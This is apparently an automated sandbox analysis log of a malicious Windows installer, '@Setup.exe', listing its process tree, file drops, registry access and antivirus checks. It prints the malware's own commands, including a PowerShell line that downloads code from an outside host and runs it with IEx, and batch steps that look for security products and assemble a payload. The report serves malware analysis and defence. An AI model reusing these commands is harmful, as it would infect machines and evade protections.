      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

      System Summary

      barindex
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Windows\ExtractLibertyJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Windows\AnthonyCognitiveJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Windows\TwikiReminderJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Windows\SpanSkilledJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
      Source: C:\Users\user\Desktop\@Setup.exeCode function: String function: 004062CF appears 58 times
      Source: @Setup.exeStatic PE information: invalid certificate
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drStatic PE information: Number of sections : 11 > 10
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe.12.drStatic PE information: Number of sections : 11 > 10
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.21.drStatic PE information: Number of sections : 11 > 10
      Source: @Setup.exe, 00000000.00000002.1666807792.00000000007A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs @Setup.exe
      Source: @Setup.exe, 00000000.00000003.1666253862.00000000007A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs @Setup.exe
      Source: @Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@84/35@5/3
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\JeepJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3896:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1168:120:WilError_03
      Source: C:\Users\user\Desktop\@Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsdCE11.tmpJump to behavior
      Source: @Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
      Source: C:\Users\user\Desktop\@Setup.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
      Source: @Setup.exeVirustotal: Detection: 23%
      Source: @Setup.exeReversingLabs: Detection: 15%
      Source: C:\Users\user\Desktop\@Setup.exeFile read: C:\Users\user\Desktop\@Setup.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\@Setup.exe "C:\Users\user\Desktop\@Setup.exe"
      Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 504701
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Cc
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Housewares" Expressions
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep u
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Corporation.com u
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp "C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$4042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeProcess created: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp "C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$5042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
      Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
      Source: C:\Users\user\Desktop\@Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 504701Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E CcJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Housewares" Expressions Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep uJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Corporation.com uJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe"Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp "C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$4042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeProcess created: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp "C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$5042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeSection loaded: sspicli.dllJump to behavior
